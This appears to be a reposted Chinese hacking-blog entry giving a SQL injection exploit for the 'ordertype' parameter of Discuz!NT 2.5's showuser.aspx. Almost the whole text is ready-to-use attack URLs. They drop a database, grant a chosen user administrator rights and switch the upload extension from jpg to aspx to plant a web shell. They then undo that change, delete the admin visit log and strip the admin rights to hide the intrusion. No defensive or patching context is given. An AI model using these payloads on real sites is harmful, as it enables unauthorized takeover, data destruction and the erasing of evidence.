[导入]Discuz!NT 2.5 showuser.aspx注入漏洞
Spirit's blog ( http://www.fuckhacker.net/ ) :
文章来源:http://www.fuckhacker.net/?action=show&id=257
http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传
得到SHELL后...
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG
http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员
文章来源:http://www.fuckhacker.net/?action=show&id=257